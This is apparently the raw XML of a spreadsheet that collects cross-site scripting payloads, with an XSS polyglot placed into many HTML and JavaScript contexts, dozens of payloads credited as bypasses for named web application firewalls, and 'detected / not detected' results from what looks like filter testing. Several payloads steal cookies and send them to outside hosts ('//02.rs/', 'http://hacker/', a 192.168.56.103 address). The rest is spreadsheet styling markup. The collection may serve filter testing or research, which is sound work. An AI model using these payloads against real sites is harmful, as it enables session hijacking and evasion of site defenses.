    <t>&lt;img border=3 alt=jaVasCript:/*-/*`/*\`/*&amp;#039;/*&amp;quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&amp;lt;/stYle/&amp;lt;/titLe/&amp;lt;/teXtarEa/&amp;lt;/scRipt/--!&amp;gt;\x3csVg/&amp;lt;sVg/oNloAd=alert()//&amp;gt;\x3e&gt;</t>
  </si>
  <si>
    <t>&lt;a href="jaVasCript:/*-/*`/*\`/*&amp;#039;/*&amp;quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&amp;lt;/stYle/&amp;lt;/titLe/&amp;lt;/teXtarEa/&amp;lt;/scRipt/--!&amp;gt;\x3csVg/&amp;lt;sVg/oNloAd=alert()//&amp;gt;\x3e"&gt;click me&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;math xlink:href="jaVasCript:/*-/*`/*\`/*&amp;#039;/*&amp;quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&amp;lt;/stYle/&amp;lt;/titLe/&amp;lt;/teXtarEa/&amp;lt;/scRipt/--!&amp;gt;\x3csVg/&amp;lt;sVg/oNloAd=alert()//&amp;gt;\x3e"&gt;click me&lt;/math&gt;</t>
  </si>
  <si>
    <t>&lt;iframe src="jaVasCript:/*-/*`/*\`/*&amp;#039;/*&amp;quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&amp;lt;/stYle/&amp;lt;/titLe/&amp;lt;/teXtarEa/&amp;lt;/scRipt/--!&amp;gt;\x3csVg/&amp;lt;sVg/oNloAd=alert()//&amp;gt;\x3e"&gt;&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;!--jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e--&gt;</t>
  </si>
  <si>
    <t>&lt;title&gt;jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e&lt;/title&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;textarea&gt;jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e&lt;/textarea&gt;</t>
  </si>
  <si>
    <t>&lt;div&gt;jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e&lt;/div&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">var str = "jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e";
</t>
  </si>
  <si>
    <t>var str = 'jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e';</t>
  </si>
  <si>
    <t>String.raw`jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e`;</t>
  </si>
  <si>
    <t>var re = /jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e/;</t>
  </si>
  <si>
    <t>&lt;script&gt;//jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;svg onload="void 'javascript:/*-/*`/*\`/*&amp;#039;/*&amp;quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&amp;lt;/stYle/&amp;lt;/titLe/&amp;lt;/teXtarEa/&amp;lt;/scRipt/--!&amp;gt;\x3csVg/&amp;lt;sVg/oNloAd=alert()//&amp;gt;\x3e';"&gt;&lt;/svg&gt;</t>
  </si>
  <si>
    <t>https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot</t>
  </si>
  <si>
    <t>detected</t>
  </si>
  <si>
    <t xml:space="preserve">Non detected </t>
  </si>
  <si>
    <t>More Info on Polyglot</t>
  </si>
  <si>
    <t>https://brutelogic.com.br/blog/building-xss-polyglots/</t>
  </si>
  <si>
    <t>https://blog.ostorlab.co/polyglot-xss.html</t>
  </si>
  <si>
    <t>https://gist.github.com/michenriksen/d729cd67736d750b3551876bbedbe626</t>
  </si>
  <si>
    <t>https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting</t>
  </si>
  <si>
    <t>https://www.sciencedirect.com/science/article/pii/S1084804518302042?casa_token=vWFWf9p_aScAAAAA:Kj38YOpSb-aQ6Ltlt1eou0ksKTg8QdSA4TsnhVFUfeoHAj7jlO0Goz0J4WH2OswwBvUS2lhSCg</t>
  </si>
  <si>
    <t>https://brightsec.com/blog/cross-site-scripting-xss/</t>
  </si>
  <si>
    <t>https://devdojo.com/mariamrebaalexander/cross-site-scripting-xss-attack-part-3</t>
  </si>
  <si>
    <t>Description</t>
  </si>
  <si>
    <t>Twitter Link</t>
  </si>
  <si>
    <t xml:space="preserve">Payload </t>
  </si>
  <si>
    <t>noembed consuming tag payload to bypass filters</t>
  </si>
  <si>
    <t>https://twitter.com/XssPayloads/status/1488066834846863361?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw</t>
  </si>
  <si>
    <t>New Chrome feature, new XSS vector! Details will now auto expand with a fragment so you don't have to use the open attribute.</t>
  </si>
  <si>
    <t>https://twitter.com/PortSwiggerRes/status/1483022028349321217?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw</t>
  </si>
  <si>
    <t>&lt;details ontoggle=alert(1)&gt;
&lt;div id="target"&gt;Hello, World!&lt;/div&gt;
&lt;details&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">A payload that bypasses F5 ASM by 
@str0d
 </t>
  </si>
  <si>
    <t>https://twitter.com/XssPayloads/status/1480847340961468417?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw</t>
  </si>
  <si>
    <t>str0d"/&gt;&lt;style&gt;
@KeyframeS
 x{}&lt;/style&gt;&lt;str style="animation-name:x;" onanimationend="alert.bind()(22)"&gt;&lt;/str&gt;</t>
  </si>
  <si>
    <t>A payload that bypasses Cloudflare WAF, by 
@ex_mi</t>
  </si>
  <si>
    <t>https://twitter.com/XssPayloads/status/1465168176266846209?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw</t>
  </si>
  <si>
    <t>&lt;img/src=x onError="`${x}`;alert(`Ex.Mi`);"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Goog axemple of payload splitting in JSON, by 
@leo__rac
 </t>
  </si>
  <si>
    <t>https://twitter.com/XssPayloads/status/1445291332491255808?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw</t>
  </si>
  <si>
    <t>firstname : &lt;img src='
lastname: 'onerror=print()&gt;
Result: 
"firstname":"&lt;img src ='","lastname":"'onerror=print()&gt;"</t>
  </si>
  <si>
    <t xml:space="preserve">A payload to bypass Akamai WAF, by 
@stealthybugs
 </t>
  </si>
  <si>
    <t>https://twitter.com/XssPayloads/status/1442746827397345280?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw</t>
  </si>
  <si>
    <t>"&gt;&lt;a/\test="%26quot;x%26quot;"href='%01javascript:/*%b1*/;location.assign("//hackerone.com/stealthy?x="+location)'&gt;Click</t>
  </si>
  <si>
    <t>will by pass WAF and execute on web apps running PHP pspell_suggest().</t>
  </si>
  <si>
    <t>https://twitter.com/XssPayloads/status/1432354432633683970?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw</t>
  </si>
  <si>
    <t>&lt;scrpt&gt;confrm()&lt;/scrpt&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">One to bypass Incapsula WAF, by 
@smaury92
 </t>
  </si>
  <si>
    <t>https://twitter.com/XssPayloads/status/1422826849957302280?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw</t>
  </si>
  <si>
    <t>&lt;input id='a'value='global'&gt;&lt;input id='b'value='E'&gt;&lt;input 'id='c'value='val'&gt;&lt;input id='d'value='aler'&gt;&lt;input id='e'value='t(documen'&gt;&lt;input id='f'value='t.domain)'&gt;&lt;svg+onload[\r\n]=$[a.value+b.value+c.value](d.value+e.value+f.value)&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">One to evade Imparva WAF, by 
@0xInfection
 </t>
  </si>
  <si>
    <t>https://twitter.com/XssPayloads/status/1420285984718172162?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw</t>
  </si>
  <si>
    <t>&lt;x/onclick=globalThis&amp;lsqb;'\u0070r\u006f'+'mpt']&amp;lt;)&gt;clickme</t>
  </si>
  <si>
    <t xml:space="preserve">A finding by 
@garethheyes
 </t>
  </si>
  <si>
    <t>https://twitter.com/XssPayloads/status/1419496628952698885?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw</t>
  </si>
  <si>
    <t>&lt;div id=x&gt;&lt;/div&gt;
&lt;script&gt;
Window.prototype.x.innerHTML='&lt;img src=1 onerror=alert(1)&gt;';
&lt;/script&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Cookie theft by 
@PortSwiggerRes
 </t>
  </si>
  <si>
    <t>https://twitter.com/XssPayloads/status/1418451457695694849?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw</t>
  </si>
  <si>
    <t>cookieStore.getAll().then(x=&gt;fetch('//02.rs/'+JSON.stringify(x)))</t>
  </si>
  <si>
    <t>https://twitter.com/XssPayloads/status/1418448229138681857?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw</t>
  </si>
  <si>
    <t>o={};
o.__proto__=window;
o.valueOf().Function('alert(1)')()</t>
  </si>
  <si>
    <t xml:space="preserve">Nice one for Chrome by 
@aemkei
 </t>
  </si>
  <si>
    <t>https://twitter.com/XssPayloads/status/1417027475675262978?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw</t>
  </si>
  <si>
    <t>$='',_=!$+$,$$=!_+$,$_=$+{},_$=_[$++],__=_[_$$=$],_$_=++_$$+$,$$$=$_[_$$+_$_],_[$$$+=$_[$]+(_.$$+$_)[$]+$$[_$_]+_$+__+_[_$$]+$$$+_$+$_[$]+__][$$$]($$[$]+$$[_$$]+_[_$_]+__+_$+"($)")()</t>
  </si>
  <si>
    <t xml:space="preserve">CVE-2021-33742 PoC by 
@ifsecure
 </t>
  </si>
  <si>
    <t>https://twitter.com/XssPayloads/status/1417021561702436872?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw</t>
  </si>
  <si>
    <t>&lt;script&gt;
var b = document.createElement("html");
b.innerHTML = Array(40370176).toString();
b.innerHTML = "";
&lt;/script&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">A payload for Safari by 
@garethheyes
</t>
  </si>
  <si>
    <t>https://twitter.com/XssPayloads/status/1412674657971576834?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw</t>
  </si>
  <si>
    <t>&lt;script&gt;
onerror=eval,new'\u{22}-alert\u{28}1\u{29}//'
&lt;/script&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">S'more destructuring payloads by 
@garethheyes
 </t>
  </si>
  <si>
    <t>https://twitter.com/XssPayloads/status/1409377277352239109?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw</t>
  </si>
  <si>
    <t>&lt;script&gt;
var{haha:onerror=alert}=0;throw 1
&lt;/script&gt;
&lt;script&gt;
var{a:onerror}={a:alert};throw 1
&lt;/script&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">And another, still by 
@garethheyes
 </t>
  </si>
  <si>
    <t>https://twitter.com/XssPayloads/status/1408318608636272641?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw</t>
  </si>
  <si>
    <t>&lt;script&gt;
throw[onerror]=[alert],1
&lt;/script&gt;</t>
  </si>
  <si>
    <t>https://twitter.com/XssPayloads/status/1408318435482759172?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw</t>
  </si>
  <si>
    <t>&lt;script&gt;
[onerror]=[alert];throw 1
&lt;/script&gt;
&lt;script&gt;
const{onerror}=alert;throw 1
&lt;/script&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt; filter bypass via unicode, by @Spyboy7711 </t>
  </si>
  <si>
    <t>https://twitter.com/XssPayloads/status/1400307415174811651?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw</t>
  </si>
  <si>
    <t>%u003Csvg onload=alert(1)&gt;
%u3008svg onload=alert(2)&gt; 
%uFF1Csvg onload=alert(3)&gt;</t>
  </si>
  <si>
    <t>A good one by 
@rodoassis
, leveraging the Sec-Fetch-Dest 'security' header...</t>
  </si>
  <si>
    <t>https://twitter.com/XssPayloads/status/1391983957684756480?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw</t>
  </si>
  <si>
    <t>&lt;Img Src=//X55.is OnLoad=import(src)&gt;</t>
  </si>
  <si>
    <t>https://twitter.com/XssPayloads/status/1389110580355682306?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw</t>
  </si>
  <si>
    <t>document.body.innerHTML=eval('Error``.stack//# sourceURL=http://\u{3c}img/src/onerror=alert(1)\u{3e}//')</t>
  </si>
  <si>
    <t xml:space="preserve">A payload that works, surprisingly. Used to bypass filter. By 
@SSkylinearafat
 </t>
  </si>
  <si>
    <t>https://twitter.com/XssPayloads/status/1377823682907738113?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw</t>
  </si>
  <si>
    <t>&lt;iframe/onload=aaajavascipt:alert(1)&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">A payload into arbitrary tags, by 
@rteranm
 </t>
  </si>
  <si>
    <t>https://twitter.com/XssPayloads/status/1372046735745429504?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw</t>
  </si>
  <si>
    <t>&lt;style&gt;
@KeyframeS
 x{}&lt;/style&gt;&lt;xss style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/xss&gt;</t>
  </si>
  <si>
    <t>https://twitter.com/XssPayloads/status/1351410136120758272?s=20&amp;t=wtUWdUsxDxAjVlSI0Rq-VA</t>
  </si>
  <si>
    <t>{{[''.constructor.prototype.charAt=[].join]|orderBy:'x=1} } };alert(1)//'}}</t>
  </si>
  <si>
    <t xml:space="preserve">Double unicode and HTML encode to bypass WAF and AngularJS filters, by 
@PortSwiggerRes
</t>
  </si>
  <si>
    <t>https://twitter.com/XssPayloads/status/1349937826234855425?s=20&amp;t=wtUWdUsxDxAjVlSI0Rq-VA</t>
  </si>
  <si>
    <t>{{$on.constructor{'&amp;bsol;&amp;bsol;u&amp;bsol;u007b61}lert`1`')()}}</t>
  </si>
  <si>
    <t>One to bypass Cloudflare WAF</t>
  </si>
  <si>
    <t>https://twitter.com/XssPayloads/status/1348494411177594887?s=20&amp;t=6Dkr5ZLqsNJ1eo-4L9dB7A</t>
  </si>
  <si>
    <t>&lt;svg onload=alert%26%230000000040"1")&gt;</t>
  </si>
  <si>
    <t>A payload to bypass filters and WAF</t>
  </si>
  <si>
    <t>https://twitter.com/XssPayloads/status/1313343975181504512?s=20&amp;t=6Dkr5ZLqsNJ1eo-4L9dB7A</t>
  </si>
  <si>
    <t>&lt;x/ onpointerRawupdatE=+\u0061\u006cert&amp;DiacriticalGrave;1&amp;DiacriticalGrave;&gt;Tocuch me!</t>
  </si>
  <si>
    <t>mod_security bypass payload</t>
  </si>
  <si>
    <t>https://twitter.com/XssPayloads/status/1310448726129938433?s=20&amp;t=6Dkr5ZLqsNJ1eo-4L9dB7A</t>
  </si>
  <si>
    <t>&lt;svg onload='new Function`["_Y000!_"].find(al\u0065rt)`'&gt;</t>
  </si>
  <si>
    <t>A vector to bypass some WAFs</t>
  </si>
  <si>
    <t>https://twitter.com/XssPayloads/status/1299206567850586113?s=20&amp;t=6Dkr5ZLqsNJ1eo-4L9dB7A</t>
  </si>
  <si>
    <t>&lt;x/onmouSeenter=window[`\x61\x6c\x65\x72\x74`]`1337`</t>
  </si>
  <si>
    <t>Vectors to bypass StackPath WAF</t>
  </si>
  <si>
    <t>https://twitter.com/XssPayloads/status/1298876497776828416?s=20&amp;t=6Dkr5ZLqsNJ1eo-4L9dB7A</t>
  </si>
  <si>
    <t>&lt;object/data=javascript:alert()&gt;
&lt;a/href="javascript%0A%0D:alert()"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">A payload without parentheses </t>
  </si>
  <si>
    <t>https://twitter.com/XssPayloads/status/1290869957924982784?s=20&amp;t=6Dkr5ZLqsNJ1eo-4L9dB7A</t>
  </si>
  <si>
    <t>&lt;svg/onload=throw/**/Uncaught=window.onerror=eval,&amp;quot;;alert\501\51&amp;quot;&gt;</t>
  </si>
  <si>
    <t>A payload bypassing IE11 and WAF filters,</t>
  </si>
  <si>
    <t>https://twitter.com/XssPayloads/status/1276386591972438017?s=20&amp;t=6Dkr5ZLqsNJ1eo-4L9dB7A</t>
  </si>
  <si>
    <t>&lt;script/%00%00v%00%00&gt;document.location.href=location.hash.slice(1)&lt;/script&gt;#javascript:alert(document.cookie)</t>
  </si>
  <si>
    <t>https://twitter.com/XssPayloads/status/1262237285766115329?s=20&amp;t=6Dkr5ZLqsNJ1eo-4L9dB7A</t>
  </si>
  <si>
    <t>A FF only vector, with self closing script tag</t>
  </si>
  <si>
    <t>https://twitter.com/XssPayloads/status/1258227668887183360?s=20&amp;t=6Dkr5ZLqsNJ1eo-4L9dB7A</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;script href=data:,alert(1) /&gt;</t>
  </si>
  <si>
    <t>A payload to evade some nasty filters forbidding html tags and "&gt;"</t>
  </si>
  <si>
    <t>https://twitter.com/XssPayloads/status/1255344531123380224?s=20&amp;t=6Dkr5ZLqsNJ1eo-4L9dB7A</t>
  </si>
  <si>
    <t>&lt;svg onload="alert(1)" &lt;="" svg=""</t>
  </si>
  <si>
    <t>A payload that bypasses Cloudflare</t>
  </si>
  <si>
    <t>https://twitter.com/XssPayloads/status/1252833695611777025?s=20&amp;t=6Dkr5ZLqsNJ1eo-4L9dB7A</t>
  </si>
  <si>
    <t>&lt;svg/OnLoad="`${prompt``}`"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Interesting vector by 
@PortSwiggerRes
 </t>
  </si>
  <si>
    <t>https://twitter.com/XssPayloads/status/1225426346366701568?s=20&amp;t=6Dkr5ZLqsNJ1eo-4L9dB7A</t>
  </si>
  <si>
    <t>&lt;div onpointerrawupdate=alert(1) style=width:100%;height:100%;position:absolute;background-color:red&gt;test</t>
  </si>
  <si>
    <t>WAF bypass payload against Firefox</t>
  </si>
  <si>
    <t>https://twitter.com/XssPayloads/status/1213991455892488192?s=20&amp;t=6Dkr5ZLqsNJ1eo-4L9dB7A</t>
  </si>
  <si>
    <t>&lt;image src\r\n=valid.jpg onloadend='new class extends (co\u006efir\u006d)/**/`` &amp;lcub;&amp;rcub;'&gt;</t>
  </si>
  <si>
    <t>A WAF bypass payload</t>
  </si>
  <si>
    <t>https://twitter.com/XssPayloads/status/1203945018861465601?s=20&amp;t=6Dkr5ZLqsNJ1eo-4L9dB7A</t>
  </si>
  <si>
    <t>&lt;img src=something onauxclick="new Function `al\ert\`xss\``"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Nice quoteless one </t>
  </si>
  <si>
    <t>https://twitter.com/XssPayloads/status/1202479322184986624?s=20&amp;t=6Dkr5ZLqsNJ1eo-4L9dB7A</t>
  </si>
  <si>
    <t>&lt;svg id=javascript:alert(10) onload=location=id&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">More Cloudflare bypasses </t>
  </si>
  <si>
    <t>https://twitter.com/XssPayloads/status/1201817936542994433?s=20&amp;t=6Dkr5ZLqsNJ1eo-4L9dB7A</t>
  </si>
  <si>
    <t>&lt;svg/onload=%26nbsp;alert`bohdan`+
1'"&gt;&lt;img/src/onerror=.1|alert``&gt;</t>
  </si>
  <si>
    <t>Cloudflare bypass</t>
  </si>
  <si>
    <t>https://twitter.com/XssPayloads/status/1201816906853953536?s=20&amp;t=6Dkr5ZLqsNJ1eo-4L9dB7A</t>
  </si>
  <si>
    <t>&lt;img src onerror=%26emsp;prompt`${document.domain}`&gt;</t>
  </si>
  <si>
    <t>Payload from a login page input tag with &lt;&gt; filtered</t>
  </si>
  <si>
    <t>https://twitter.com/XssPayloads/status/1197437069435555840?s=20&amp;t=6Dkr5ZLqsNJ1eo-4L9dB7A</t>
  </si>
  <si>
    <t>" formaction=java%26Tab%3bscript:ale%26Tab%3brt() type=image src=""</t>
  </si>
  <si>
    <t xml:space="preserve">Akamai WAF bypass through right-click trigger </t>
  </si>
  <si>
    <t>https://twitter.com/XssPayloads/status/1197436457889218561?s=20&amp;t=6Dkr5ZLqsNJ1eo-4L9dB7A</t>
  </si>
  <si>
    <t>&lt;details onauxclick=confirm`xss`&gt;&lt;/details&gt;</t>
  </si>
  <si>
    <t>XSS filter bypass</t>
  </si>
  <si>
    <t>https://twitter.com/XssPayloads/status/1191294931274518533?s=20&amp;t=6Dkr5ZLqsNJ1eo-4L9dB7A</t>
  </si>
  <si>
    <t>&lt;xss&lt;script&gt;&gt;&amp;28;prompt();&amp;28;&lt;&lt;/script&gt;/xss&gt;</t>
  </si>
  <si>
    <t>https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/XSS%20in%20Angular.md</t>
  </si>
  <si>
    <t>"&gt;&lt;SCRIPT&gt;var+img:new+Image  () ; img. src:"http://hacker/"%20+%20document,  cookie ;&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">http://victim/promo?product_id=100&amp;title=Foo#&lt;SCRIPT&gt;alert  ('XSS%20Testing') &lt;/SCRIPT&gt; </t>
  </si>
  <si>
    <t>&lt;script&gt;document.write('&lt;img src=http://192.168.56.103:5000?c='+escape(document.cookie)+'&gt;');&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;a href="&amp;#106;avascript:alert('Successful XSS')"&gt;Click this link!&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="&amp;#x6A;avascript:alert(document.cookie)"&gt;Click this link!&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;body onload="eval(atob('YWxlcnQoJ1N1Y2Nlc3NmdWwgWFNTJyk='))"&gt;</t>
  </si>
  <si>
    <t>&lt;a href="&amp;#x6A;avascript&amp;#0000058&amp;#0000097lert('Successful XSS')"&gt;Click this link!&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;iframe src=# onmouseover=alert(String.fromCharCode(88,83,83))&gt;&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>https://netsec.expert/posts/xss-in-2021/index.html</t>
  </si>
  <si>
    <t>https://netsec.expert/posts/xss-in-2021/</t>
  </si>
  <si>
    <t>https://github.com/Proviesec/xss-payload-list</t>
  </si>
  <si>
    <t>NOT DETECTED</t>
  </si>
  <si>
    <t>DETECTED</t>
  </si>
  <si>
    <t>`&gt;&lt;script&gt;/* *\x2Fjavascript:alert(1)// */&lt;/script&gt;</t>
  </si>
  <si>
    <t>DETECTED
 &lt;script&gt;javascript:alert(1)&lt;/script\x0D</t>
  </si>
  <si>
    <t>NOT DETECTED
 &lt;script&gt;javascript:alert(1)&lt;/script\x0A</t>
  </si>
  <si>
    <t>NOT DETECTED
 &lt;script&gt;javascript:alert(1)&lt;/script\x0B</t>
  </si>
  <si>
    <t>NOT DETECTED
 &lt;script charset=\x22&gt;javascript:alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>`&gt;&lt;p&gt;&lt;svg&gt;&lt;script&gt;a='hello\x27;javascript:alert(1)//';&lt;/script&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;a href=javas\x00cript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>`&gt;&lt;\x3Cimg src=xxx:x onerror=javascript:alert(1)&gt;</t>
  </si>
  <si>
    <t>`&gt;&lt;\x00img src=xxx:x onerror=javascript:alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;script src="data:\xD4\x8F</t>
  </si>
  <si>
    <t>javascript:alert(1)"&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script src="data:\xE0\xA4\x98</t>
  </si>
  <si>
    <t>&lt;script src="data:\xCB\x8F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</si>
</sst>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color theme="1"/>
      <name val="Arial"/>
    </font>
    <font>
      <u/>
      <color rgb="FF1155CC"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="14.0"/>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <u/>
      <color rgb="FF1155CC"/>
    </font>
    <font>
      <sz val="18.0"/>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <u/>
      <color rgb="FF1155CC"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
    </font>
    <font>
      <u/>
      <color rgb="FF1155CC"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <color theme="1"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FFD9D9D9"/>
      <name val="Arial"/>
    </font>
    <font>
      <color rgb="FF000000"/>
      <name val="Arial"/>
    </font>
    <font>
      <u/>
      <color rgb="FF0000FF"/>
    </font>
    <font>
      <color theme="1"/>
      <name val="Menlo"/>
    </font>
    <font>
      <u/>
      <sz val="11.0"/>
      <color rgb="FF222222"/>
      <name val="&quot;Google Sans&quot;"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF222222"/>
      <name val="&quot;Google Sans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right/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 shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf quotePrefix="1" borderId="0" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="2" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="5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2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="1" fillId="0" fontId="8" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="2" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0"/>
    </xf>
    <xf borderId="1" fillId="0" fontId="10" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" vertical="bottom"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
